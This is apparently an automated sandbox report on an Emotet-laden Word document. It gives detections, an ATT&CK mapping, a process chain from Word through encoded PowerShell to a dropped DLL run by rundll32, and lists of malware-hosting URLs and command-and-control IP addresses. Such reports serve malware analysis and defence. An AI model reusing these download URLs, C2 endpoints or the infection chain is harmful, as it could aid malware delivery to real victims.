                    Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation11Windows Service1Windows Service1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting12Boot or Logon Initialization ScriptsProcess Injection111Deobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter111Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 336961 Sample: Informacion_4-09757.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 12 other signatures 2->59 14 cmd.exe 2->14         started        17 WINWORD.EXE 436 28 2->17         started        process3 signatures4 73 Suspicious powershell command line found 14->73 75 Very long command line found 14->75 77 Encrypted powershell cmdline option found 14->77 79 PowerShell case anomaly found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 paulscomputing.com 216.218.207.98, 49167, 80 CENTRALUTAHUS United States 19->51 49 C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll, PE32 19->49 dropped 63 Powershell drops PE file 19->63 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 2 26->28         started        signatures11 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->71 31 rundll32.exe 1 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 1 31->34         started        process14 signatures15 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->61 37 rundll32.exe 1 34->37         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->65 40 rundll32.exe 1 37->40         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->67 43 rundll32.exe 1 40->43         started        process20 signatures21 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->69 46 rundll32.exe 1 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Informacion_4-09757.doc39%MetadefenderBrowse
                    Informacion_4-09757.doc76%ReversingLabsScript-Macro.Trojan.Valyria

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll100%Joe Sandbox ML
                    C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll90%ReversingLabsWin32.Trojan.Emotet

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    9.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    9.2.rundll32.exe.1a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    14.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    10.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    12.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    7.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    15.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    16.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    16.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    15.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    10.2.rundll32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    11.2.rundll32.exe.250000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    12.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    8.2.rundll32.exe.700000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    11.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                    7.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://goldilockstraining.com/wp-includes/bftt/100%Avira URL Cloudmalware
                    http://biglaughs.org/smallpotatoes/rRwRzc/100%Avira URL Cloudmalware
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://paulscomputing.com0%Avira URL Cloudsafe
                    http://paulscomputing.com/CraigsMagicSquare/H/100%Avira URL Cloudmalware
                    http://goldcoastoffice365.com/temp/X/100%Avira URL Cloudphishing
                    http://goldcoastoffice365.com/temp/X/P100%Avira URL Cloudphishing
                    http://azraktours.com/wp-content/NWF9jC/100%Avira URL Cloudmalware
                    http://josegene.com/theme/gU8/100%Avira URL Cloudmalware
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    https://jeffdahlke.com/css/bg4n3/100%Avira URL Cloudmalware
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    https://167.71.148.58:443/ta2men4jqfnerm/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paulscomputing.com
                    216.218.207.98
                    truetrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://paulscomputing.com/CraigsMagicSquare/H/true
                      • Avira URL Cloud: malware
                      unknown
                      https://167.71.148.58:443/ta2men4jqfnerm/true
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpfalse
                          high
                          https://goldilockstraining.com/wp-includes/bftt/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://biglaughs.org/smallpotatoes/rRwRzc/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://paulscomputing.compowershell.exe, 00000005.00000002.2100658698.0000000003B1A000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmpfalse
                                high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmpfalse
                                  high
                                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpfalse
                                    high
                                    http://goldcoastoffice365.com/temp/X/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://goldcoastoffice365.com/temp/X/Ppowershell.exe, 00000005.00000002.2096848822.0000000002C06000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://azraktours.com/wp-content/NWF9jC/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmpfalse
                                      high
                                      http://josegene.com/theme/gU8/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2104721248.0000000002830000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      https://jeffdahlke.com/css/bg4n3/powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmpfalse
                                        high
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpfalse
                                          high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          167.71.148.58
                                          unknownUnited States
                                          14061DIGITALOCEAN-ASNUStrue
                                          216.218.207.98
                                          unknownUnited States
                                          36103CENTRALUTAHUStrue
                                          202.187.222.40
                                          unknownMalaysia
                                          9930TTNET-MYTIMEdotComBerhadMYtrue
                                          184.66.18.83
                                          unknownCanada
                                          6327SHAWCAtrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:336961
                                          Start date:07.01.2021
                                          Start time:13:52:57
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 11m 43s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Informacion_4-09757.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winDOC@28/9@1/4
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HDC Information:
                                          • Successful, ratio: 86.7% (good quality ratio 81.4%)
                                          • Quality average: 75.1%
                                          • Quality standard deviation: 28.4%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Found warning dialog
                                          • Click Ok
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                          • TCP Packets have been reduced to 100
                                          • Execution Graph export aborted for target powershell.exe, PID 1692 because it is empty
                                          • Execution Graph export aborted for target rundll32.exe, PID 2696 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 2708 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 3008 because there are no executed function
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/336961/sample/Informacion_4-09757.doc

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:53:40API Interceptor1x Sleep call for process: msg.exe modified
                                          13:53:40API Interceptor36x Sleep call for process: powershell.exe modified
                                          13:53:45API Interceptor546x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          167.71.148.58Info.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
                                          09922748 2020 909_3553.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/hmj5vtnwvmoed5al/v2rzu19kezl4ociy/lwcymauesm35l/scrqoykcge7ozr/lwmckdg2s4/
                                          info-29-122020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/qk90ciyt532x3l/3frjvkqc2dudu/bwrw/
                                          79685175.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/ddfeddgtlve8/qea5xg5lugywunnrb/3fep6lwfy/5iyhveusfl/walzhzdp/
                                          INV750178 281220.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/n8j7z917hs/
                                          ARCHIVOFile-2020-IM-65448896.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/dz0y/
                                          MENSAJE_29_2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/9kb8jd09jfjjzu6p/710krlahr1w7x1ai4dw/vrx55jw5pft/29cpm1xmdw/44c4i7/
                                          MENSAJE_29_2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/9d9qfmnts3/vjvjz2rwjwd3/kruxv/r53q9e331/vmffjrhd6r8m0no7f0/
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/r8a9ihd5x7y9gubs/0w29tdx9/w9aqw0fel8ghiol/
                                          ARCH.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/yndmmlzko00/thlmglu2/litlfgg7al5t/7c2tfqo837z45f/
                                          naamloos-40727_8209243962.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/qov6j8tqrxo/qmy5tpwx15euwz50u/etk5u/er4m7h0jkgtu0lqulo/0npx0hy2i/yjsj5l2i/
                                          arc-20201229-07546.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/rmc2rtnzt4/fga45dyk3awr/2sr766n207t/
                                          FIL_49106127 528164.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/10uvse7/v0kinw131/ed37ws4ddndv1iwbh9/a3yymy4k79ii39ps/
                                          Adjunto_2020_UH-13478.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/495u60b7ajrab1a3v/6l2h13gy/wjaosw38b/dftbhdpoilzw3/em8pnsrzerk714/6919nubsvqxw2911/
                                          Dati.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/i6p9p6/
                                          4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/dd8xgec1513nstpclm7/1tb9c9bqpxml9mrid55/
                                          ARCH.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/1mpy4lrtxykgw5i/yn5yixx/
                                          LIST_20201229_1397.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/11c0whd0/
                                          documento 2912 2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/ra3q90a4b9qy3435u4/3ka3yw5o/4ihgodinbet/ffq83awdif0a69irje1/m9uclpm90mj/
                                          INFO 2020 DWP_947297.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/wps70yc/suknxvfkubdwr/8m58qopltial6j/zs8odemvec0x72h/
                                          202.187.222.40index.html.dllGet hashmaliciousBrowse
                                          • 202.187.222.40/6knpolw2ea15x/wl5r20ctm3/
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/mwhowwqb/gks2aqnysulsbbf/v6acyr4iy3c91t/ull4jzd9gg/ejl9fk51o96izzc/
                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 202.187.222.40/3mm3s1d7s7s4pj3/iktbo/gynznozxnj1dq7/5wici4/usvuanvlngtkv/t3gjqtewd3fpq/
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/qp1n21x/dm6rx/
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 202.187.222.40/4q2vp2zhr/tw6gc8b11d4dlpw4o/
                                          INFO-22.docGet hashmaliciousBrowse
                                          • 202.187.222.40/1e56hy0va62yk/mt5n1liyo5hg/6efu94gy/rxzydao0a3bbzw/
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 202.187.222.40/3u7zpjzcji/pdgc5fp1c/9tg5/
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/7iga49cgomahelodxo/
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 202.187.222.40/xqmtay/
                                          as233456.docGet hashmaliciousBrowse
                                          • 202.187.222.40/n91cd/66sk22clombtb17lxc/dr4e/f27un216im1/gx8f2z/gmzqc3/
                                          Y0124.docGet hashmaliciousBrowse
                                          • 202.187.222.40/uoj70yal/

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          DIGITALOCEAN-ASNUSInfo.docGet hashmaliciousBrowse
                                          • 167.71.148.58
                                          Informacion_29.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                                          • 134.209.238.18
                                          readme.docGet hashmaliciousBrowse
                                          • 159.89.126.148
                                          http://cvpro.info/wp-admin/fzNN04Xs2LGKNw6vR3M/Get hashmaliciousBrowse
                                          • 206.189.52.133
                                          http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                          • 167.71.72.151
                                          http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                          • 37.139.1.159
                                          DAT 2020_12_30.docGet hashmaliciousBrowse
                                          • 138.197.202.203
                                          http://yfnyblv.yobinsetio.site/Get hashmaliciousBrowse
                                          • 165.22.207.20
                                          http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=Get hashmaliciousBrowse
                                          • 188.166.103.55
                                          #Ud83d#Udcde mkoxlien@hbs.net @ 503 AM 503 AM.pff.HTMGet hashmaliciousBrowse
                                          • 159.89.4.250
                                          https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                          • 167.172.136.187
                                          #Ud83d#Udcde roberto.hernandez@hoerbiger.com @[DateTime][Name].pff.HTMGet hashmaliciousBrowse
                                          • 159.89.4.250
                                          http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAcGet hashmaliciousBrowse
                                          • 139.59.54.187
                                          ARCHIVOFile.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          Doc 2912 75513.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          rib.exeGet hashmaliciousBrowse
                                          • 159.65.44.102
                                          79685175.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          DATI 2020.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          7mB0FoVcSn.exeGet hashmaliciousBrowse
                                          • 139.59.19.157
                                          TTNET-MYTIMEdotComBerhadMYInfo.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          index.html.dllGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          INFO-22.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          as233456.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Y0124.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          nIUMFDogK0.exeGet hashmaliciousBrowse
                                          • 202.187.199.171
                                          Transfer invoice.vbsGet hashmaliciousBrowse
                                          • 61.6.84.83
                                          REMITTANCE SLI.exeGet hashmaliciousBrowse
                                          • 61.6.13.149
                                          a2.ex.exeGet hashmaliciousBrowse
                                          • 202.184.167.189
                                          meront.exeGet hashmaliciousBrowse
                                          • 61.6.30.223
                                          31PAYMENT ADVIC.exeGet hashmaliciousBrowse
                                          • 61.6.43.245
                                          Wollin_Info.docGet hashmaliciousBrowse
                                          • 202.190.140.230
                                          CENTRALUTAHUSPO_08312020.xlsGet hashmaliciousBrowse
                                          • 216.218.206.55
                                          SHAWCAInfo.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          84-2020-98-6493170.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          index.html.dllGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 184.66.18.83
